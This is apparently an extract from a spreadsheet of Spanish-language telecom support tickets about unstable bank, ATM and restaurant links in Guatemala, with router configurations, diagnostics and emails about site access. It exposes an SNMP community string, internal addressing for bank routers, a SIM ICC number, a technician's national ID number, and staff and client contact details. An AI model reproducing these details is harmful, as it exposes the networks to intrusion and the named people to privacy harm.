INTERNET  10.103.10.196           -   30E4.DBC4.B040  ARPA   GIGABITETHERNET0/0
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/265900146T/_/
GI0/1                          DOWN           DOWN     WAN REDUNDANTE SATELITAL
FA0/0/0                        ADMIN DOWN     DOWN     LAN DEL CLIENTE
FA0/0/1                        ADMIN DOWN     DOWN     INTERFAZ SIN USO
FA0/0/2                        ADMIN DOWN     DOWN     INTERFAZ SIN USO
FA0/0/3                        ADMIN DOWN     DOWN     INTERFAZ SIN USO
LO5                            UP             UP       MONITOREO DEL CNOC
LO100                          UP             UP       SOURCE TUNNEL
NV0                            UP             UP
TU0                            UP             UP       PRINCIPAL CLARO
TU1                            UP             UP       REDUNDANCIA SATELITAL
VL1                            ADMIN DOWN     DOWN     LAN DEL CLIENTE
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.103.10.196   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.6.13.198     YES NVRAM  DOWN                  DOWN
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.109.32   YES NVRAM  UP                    UP
LOOPBACK100                10.145.0.74     YES NVRAM  UP                    UP
NVI0                       10.103.10.196   YES UNSET  UP                    UP
TUNNEL0                    10.145.6.74     YES NVRAM  UP                    UP
TUNNEL1                    10.145.6.78     YES NVRAM  UP                    UP
VLAN1                      10.145.22.129   YES NVRAM  ADMINISTRATIVELY DOWN DOWN
CC_AZTECA_GT_SUC_006848_FRAYBARTOLOME_265900146T#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN ELEKTRADATOS 10.103.10.196
  PING 10.103.10.196: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.10.196 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    78 PACKET(S) RECEIVED
    22.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 13/13/15 MS
RUTA IP:
PE: 10.179.28.71
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.103.10.196
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.103.10.196/32  DIRECT  0    0                 0.0.0.0         VLANIF339			</t>
  </si>
  <si>
    <t xml:space="preserve">SE TIENE INESTABILIDAD ENTRE 10.87.28.11 Y 10.87.228.5  SE PROCEDE A VALIDAR SI SE ENCUENTRA HAY ALGUNA FALLA GENERAL SOBRE LA INESTABILIDAD.
PING -Q -C 100 -S 100 -M 5 -VPN ADMIN_CISCO_ISLAS 10.87.28.11
  PING 10.87.28.11: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.28.11 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/39 MS
RUTA IP:
PE: 10.179.28.71
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ADMIN_CISCO_ISLAS 10.87.28.11
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ADMIN_CISCO_ISLAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.87.28.11/32  DIRECT  0    0                 0.0.0.0         VLANIF189			</t>
  </si>
  <si>
    <t>F4576331</t>
  </si>
  <si>
    <t>SE MANDA CORREO A CLIENTE SOLICITANDO COORDINAR ACCESOS.
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 29 DE MAYO DE 2022 11:43
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE ACCESOS || F4576331 || REDUNDANCAGENCIA 509
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO A LA ALARMA QUE SE TIENE EN EL ENLACE, SOLICITAMOS SU APOYO COORDINANDO ACCESOS A LA AGENCIA PARA EL SIGUIENTE PERSONAL:
GANDHI JOSÉ GARCÍA QUIÑÓNEZ   DPI  2602 73627 0401
QUEDAMOS ATENTOS A LOS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE VALIDA COLA DE CORREOS Y SE OBSERVA RESPUESTA POR PARTE DE CLIENTE // SE PROCEDE A APERTURAR FALLA
DE: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 15:33
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; CENTRO COMERCIAL SANTA AMELIA &lt;AGE509@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS || F4576331 || REDUNDANCAGENCIA 509
BUENA TARDE
SE BRINDA ACCESO.
POR FAVOR,</t>
  </si>
  <si>
    <t>SIN RESPUESTA DE CLIETNE, SE REENVIA CORREO POR DISTANCIA YA QUE ENLACE PRINCIPAL UP SE REPGRAGRAMA MAÑANA A LAS 9:00 AM
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 29 DE MAYO DE 2022 14:21
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS || F4576331 || REDUNDANCAGENCIA 509
BUENAS TARDES ESTIMADOS.
DEBIDO A LA DISTANCIA Y AUN NO CONTAR CON RESPUESTA SU APOYO COORDINANDO EL ACCESO A LA AGENCIA PARA EL DÍA DE MAÑANA LUNES A LAS 9:00 AM, QUEDAMOS ATENTOS A LOS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4576354</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN CON PERDIDAS AL ROUTER CPE | ENLACE INESTABLE SE PROCEDE A DEJAR EN MONITOREO YA QUE SE ENCUENTRA UN TANTO INESTABLE EL CAJERO ES POSIBLE QUE SEA POR INCLEMENCIAS NATURALES  .
ROUTER CPE ACTIVO HACE 1 SEMANA.
UPTIME GENERAL DEL CPE: 1W0D23H51M52S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; TVROUTER  BASE METH 30 5 VERSION 11.01.05.00.02
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
;
   ADD DEVICE PPP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 20
   ADD DEVICE LOOPBACK 5
   SET DATA-LINK AT CELLULAR1/0
   SET DATA-LINK NIC CELLULAR1/1
   SET HOSTNAME CC_TYT_GT_ATM1477
   SET HOST-LOCATION "10 CALLE PRINCIPAL SAN ANDRES VILLA SECA, LA MAQUINA, RETALHULEU"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CLASS-MAP
; -- CLASS-MAP MENU CONFIGURATION --
      CLASS-MAP "CM-IN"
         ENTRY 1 DEFAULT
         ENTRY 1 PERMIT
;
      EXIT
;
   EXIT
;
   FEATURE POLICY-MAP
; -- POLICY-MAP MENU CONFIGURATION --
      POLICY-MAP "PM-IN_1M"
         CLASS CM-IN CONFIGURATION
            POLICE 1024 1800 3600
         EXIT
;
      EXIT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147.149 255.255.255.252
;
      SERVICE-POLICY PM-IN_1M INPUT
;
;
      REPEATER-SWITCH
; -- SWITCH USER CONFIG --
         PORT 2 DISABLE
         PORT 3 DISABLE
         PORT 4 DISABLE
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/806300455T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS 10.103.82.68 255.255.255.128
;
   EXIT
;
;
   NETWORK PPP10
; -- GENERIC PPP USER CONFIGURATION --
      IP ADDRESS UNNUMBERED
;
      PPP
; -- PPP CONFIGURATION --
         IPCP LOCAL ADDRESS ASSIGNED
         LCP ECHO-REQ OFF
      EXIT
;
   EXIT
;
   NETWORK TNIP10
; -- IP TUNNEL NET CONFIGURATION --
      IP ACCESS-GROUP 100 IN
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.177.155 255.255.255.255
;
   EXIT
;
   SET CONSOLE
; -- CONSOLE CONFIGURATION --
      LOGIN BLOCKING 30S
      LOGIN AUTHENTICATION LOCAL
   EXIT
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.177.155
      ROUTER-ID 10.212.177.155
;
      ROUTE 1.2.3.4 255.255.255.255 PPP10
      ROUTE 4.3.2.1 255.255.255.255 PPP10
      ROUTE 0.0.0.0 0.0.0.0 TNIP10 DISTANCE 160 TRACK NSLA-ADVISOR 20
      ROUTE 0.0.0.0 0.0.0.0 TNIP20 COST 100 DISTANCE 160
      ROUTE 0.0.0.0 0.0.0.0 10.103.82.65
;
   EXIT
;
;
   PROTOCOL OSPF
; -- OPEN SPF-BASED ROUTING PROTOCOL CONFIGURATION CONSOLE --
      ENABLE OSPF
;
      AREA 0.0.1.101 DEFAULT
;
      INTERFACE 10.103.82.68 DEFAULT
      INTERFACE 10.103.82.68 AREA 0.0.1.101
      INTERFACE 10.103.82.68 HELLO-INTERVAL 1S
      INTERFACE 10.103.82.68 NETWORK-TYPE BROADCAST
      INTERFACE 10.103.82.68 DEAD-INTERVAL 4S
      INTERFACE 10.103.82.68 ROUTER-PRIORITY 0
;
      INTERFACE 10.233.147.149 DEFAULT
      INTERFACE 10.233.147.149 AREA 0.0.1.101
;
      INTERFACE 10.212.177.155 DEFAULT
      INTERFACE 10.212.177.155 AREA 0.0.1.101
;
      NEIGHBOR ETHERNET0/1 10.103.82.65 YES
;
   EXIT
;
;
;
   PROTOCOL SNMP
; -- SNMP USER CONFIGURATION --
      COMMUNITY NM15SNMPRO SUBNET 10.255.24.144 255.255.255.248
      COMMUNITY NM15SNMPRO SUBNET 190.148.15.192 255.255.255.240
;
      TRAP SENDING-PARAMETERS REACHABILITY-CHECKING IP-ROUTE
      TRAP SENDING-PARAMETERS FORMAT STANDARD
   EXIT
;
;
   FEATURE BANDWIDTH-RESERVATION
; -- BANDWIDTH RESERVATION USER CONFIGURATION --
      NETWORK ETHERNET0/0
         ENABLE
         CLASS CONTROL 100 REAL-TIME
;
         CLASS LOCAL 10
;
         CLASS DEFAULT 40
         CLASS DEFAULT RATE-LIMIT 1024 1800 3300
;
         RATE-LIMIT 1024 1900 3300
      EXIT
;
   EXIT
;
   FEATURE NSM
; -- NETWORK SERVICE MONITOR CONFIGURATION --
      OPERATION 2
; -- NSM OPERATION CONFIGURATION --
         TYPE ECHO IPICMP 1.2.3.4
         FREQUENCY 3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1477 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
A4-BE-2B-E5-7F-1F     10.103.82.65     238
CC_TYT_GT_ATM1477 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
00-1A-D4-1E-4F-32     10.233.147.150   240
CC_TYT_GT_ATM1477 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
CELLULAR1/0  UP
CELLULAR1/1  UP
PPP10  NOT
PRESENT  TNIP10
DOWN  TNIP20
DOWN  LOOPBACK5
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.147.149/30
ETHERNET0/1        10.103.82.68/25
PPP10              UNNUMBERED - USING GLOBAL-ADDRESS (10.212.177.155)
TNIP20             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
LOOPBACK5          10.212.177.155/32
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.177.155
ROUTER-ID           10.212.177.155
GLOBAL-ADDRESS      10.212.177.155
CC_TYT_GT_ATM1477 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
======================================
..:: NETWORK STATUS ::..
======================================
	SIM STATUS: OK
	REGISTRATION STATE: REGISTERED
	PUBLIC LAND MOBILE NETWORK CODE: 70403
	PUBLIC LAND MOBILE NETWORK NAME: MOVISTAR
	NETWORK TECHNOLOGY CURRENTLY IN USE: LTE
	CURRENT SERVICE DOMAIN REGISTERED: PS (CAPABLE PS)
	CURRENT ROAMING STATUS: OFF
	3GPP CELL ID: 0008D716
	RADIO BAND EUTRABAND2_1900_PCS
	LTE RX CHAN: 899
	LTE TX CHAN: 18899
	LTE NETWORK BANDWIDTH: 20 MHZ
	PS ATTACH STATE: ATTACHED
	EMM STATE: (2) REGISTERED
	EMM SUBSTATE: (0) NORMAL SERVICE
	EMM CONNECTION: (0) RRC IDLE
	LTE TRACKING AREA CODE (TAC): 0FB5
	RX LEVEL (DBM): -75
	COVERAGE LEVEL: 4 (**** )
======================================
..:: NETWORK DATA CONNECTION ::..
======================================
	CONNECTION STATUS: DISCONNECTED
CC_TYT_GT_ATM1477 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN APN_5B_XT 10.103.82.68
  PING 10.103.82.68: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.82.68 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    76 PACKET(S) RECEIVED
    24.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 66/90/112 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE APN_5B_XT 10.103.82.68
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : APN_5B_XT
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.82.68/32  DIRECT  0    0                 0.0.0.0         VLANIF1712</t>
  </si>
  <si>
    <t>F4576358</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN CON PERDIDAS AL ROUTER CPE | ENLACE INESTABLE SE PROCEDE A DEJAR EN MONITOREO YA QUE SE ENCUENTRA UN TANTO INESTABLE EL CAJERO ES POSIBLE QUE SEA POR INCLEMENCIAS NATURALES.
ROUTER CPE ACTIVO HACE 2 DÍAS.
UPTIME GENERAL DEL CPE: 2D12H38M48S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; TVROUTER  BASE VDSL2/ADSL METH 30 13 VERSION 10.09.24
; WARNING: DYNAMIC CONFIGURATION IS NOT SAVED!
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
   SET HOSTNAME CC_TYT_GT_ATM4369
   SET HOST-LOCATION "KM. 167.5 FINCA SANTA ROSITA, TIQUISATE, ESCUINTLA (BAM COBIGUA TIQUISATE)"
   ADD DEVICE PPP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 2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83.153 255.255.255.252
;
;
      REPEATER-SWITCH
; -- SWITCH USER CONFIG --
         PORT 2 DISABLE
         PORT 3 DISABLE
         PORT 4 DISABLE
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/47503431T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS 10.103.13.15 255.255.255.128
;
;
   EXIT
;
   NETWORK PPP10
; -- GENERIC PPP USER CONFIGURATION --
      DESCRIPTION "TEL  59679329 ICC  8950201017783865040F/_/47503432T/_/"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432T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      DESCRIPTION "WAN REDUNDANTE/_/47503432T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.162.213 255.255.255.255
;
   EXIT
;
   SET CONSOLE
; -- CONSOLE CONFIGURATION --
      LOGIN BLOCKING 30S
      LOGIN AUTHENTICATION LOCAL
   EXIT
;
   SET TELNET
; -- TELNET USER CONFIGURATION --
      SET MAX-TELNETS 0
   EXIT
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.162.213
      ROUTER-ID 10.212.162.213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103.13.15 DEFAULT
      INTERFACE 10.103.13.15 AREA 0.0.1.101
      INTERFACE 10.103.13.15 HELLO-INTERVAL 1S
      INTERFACE 10.103.13.15 NETWORK-TYPE BROADCAST
      INTERFACE 10.103.13.15 DEAD-INTERVAL 4S
      INTERFACE 10.103.13.15 ROUTER-PRIORITY 0
;
      INTERFACE 10.233.83.153 DEFAULT
      INTERFACE 10.233.83.153 AREA 0.0.1.101
;
      INTERFACE 10.212.162.213 DEFAULT
      INTERFACE 10.212.162.213 AREA 0.0.1.101
;
      NEIGHBOR ETHERNET0/1 10.103.13.1 YES
;
   EXIT
;
;
;
   PROTOCOL SNMP
; -- SNMP USER CONFIGURATION --
      COMMUNITY NM15SNMPRO SUBNET 10.255.24.144 255.255.255.248
      COMMUNITY NM15SNMPRO SUBNET 190.148.15.192 255.255.255.240
;
   EXIT
;
   FEATURE BANDWIDTH-RESERVATION
; -- BANDWIDTH RESERVATION USER CONFIGURATION --
      NETWORK ETHERNET0/1
         ENABLE
         CLASS CONTROL 100 REAL-TIME
;
         CLASS LOCAL 10
;
         CLASS DEFAULT 40
;
         RATE-LIMIT 1024 102
      EXIT
;
   EXIT
;
   FEATURE NSM
; -- NETWORK SERVICE MONITOR CONFIGURATION --
      OPERATION 2
; -- NSM OPERATION CONFIGURATION --
         TYPE ECHO IPICMP 1.2.3.4
         FREQUENCY 3
         SOURCE-IPADDR 10.218.49.77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4369 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
A4-BE-2B-E5-7F-1F     10.103.13.1      240
00-A0-26-C6-48-99     10.103.13.24     229
CC_TYT_GT_ATM4369 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
00-07-32-7C-F1-FB     10.233.83.154    230
CC_TYT_GT_ATM4369 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
ETHERNET0/2  DOWN
ATM0/0  DOWN
CELLULAR1/0  UP
CELLULAR1/1  UP
PPP10  UP
TNIP10  UP
TNIP20  UP
LOOPBACK5  UP
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.83.153/30
ETHERNET0/1        10.103.13.15/25
PPP10              UNNUMBERED - USING GLOBAL-ADDRESS (10.218.49.77)
TNIP10             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
TNIP20             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
LOOPBACK5          10.212.162.213/32
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.162.213
ROUTER-ID           10.212.162.213
GLOBAL-ADDRESS      10.212.162.213
CC_TYT_GT_ATM4369 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
REGISTRATION STATE: HOME NETWORK
PLMN PUBLIC LAND MOBILE NETWORK CODE: 70401
PLMN PUBLIC LAND MOBILE NETWORK NAME: CLAROGTM
CELL LOCATION AREA CODE 0X0192 (402), IDENTIFICATION 0X586E (22638)
SYSTEM MODE WCDMA, SERVICE DOMAIN: PS
NETWORK TECHNOLOGY CURRENTLY IN USE: HSDPA/HSUPA
RECEIVE SIGNAL CODE POWER OF THE ACTIVE SET'S STRONGEST CELLS(RSCP):  -93 DBMTOTAL ENERGY PER CHIP PER POWER DENSITY VALUE OF SET'S STRONGEST CELLS(ECIO):  -7.0 DBLAST ECIO MEASURED IN WCDMA DATA MODE:  -8.5 DBPRIMARY SCRAMBLING CODE (PSC) 0X0005 (5)
OPERATIONAL STATUS
CURRENT TIME:  218117		TEMPERATURE: 57
BOOTUP TIME:   1		MODE:        ONLINE
SYSTEM MODE:   WCDMA      	PS STATE:    ATTACHED
WCDMA BAND:    WCDMA1900  	GSM BAND:    UNKNOWN
WCDMA CHANNEL: 9663		GSM CHANNEL: 65535
GMM (PS) STATE:REGISTERED     	NORMAL SERVICE
MM (CS) STATE: IDLE           	NORMAL SERVICE
WCDMA L1 STATE:L1M_FACH       	RRC STATE:   CELL_FACH
RX LEVEL (DBM):-91
COVERAGE LEVEL: 2 (**   )
CC_TYT_GT_ATM4369 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TRANSFERENCIAS 10.103.13.15
  PING 10.103.13.15: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.13.15 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    87 PACKET(S) RECEIVED
    13.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 72/94/111 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.13.15
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.103.13.15/32  DIRECT  0    0                 0.0.0.0         VLANIF10</t>
  </si>
  <si>
    <t>F4576360</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290  CONTESTA LA SEÑORITA GUADALUPE SANCHEZ  INDICA QUE SE PUEDE PROCEDER CON EL CIERRE DEL TICKET **
ID 2001055836
**</t>
  </si>
  <si>
    <t>F4576365</t>
  </si>
  <si>
    <t>SE SOLICITA EL APOYO PARA LA VISITA EL DIA DE MAÑANA A LAS 5.00 AM LA ANTENA SE ENCUENTR TIRADA EN EL TECHO DE EL CAMPERO INDICA EL CLIENTE</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL INDICANDO AVANCES DEL ENLACE DE DATOS YA QUE ESTE ESTA ACTIVO PERO CON TIEMPOS ALTOS
 ---*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 25 DE MAYO DE 2022 01:24
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;
ASUNTO: RE: C634 - CAIDO, ENLACE DE DATOS CLARO 38300513, 671900172
BUENOS DÍAS ESTIMADO SR. REYES.
                ACTUALMENTE EL SERVICIO SE ENCUENTRA RESTABLECIDO SIN EMBARGO SE TIENEN TIEMPOS ALTOS, PERSONAL A CARGO NOS INDICA QUE SE CONTINUARÁ EL SEGUIMIENTO A PRIMERA HORA CON EL PERSONAL DEL PUNTO REMOTO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4576403</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL POR PARTE DE CLARO OK .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 7 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M9, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_0488 UPTIME IS 7 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 04:13:09 UTC WED MAY 25 2022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539004G
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1539004G
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
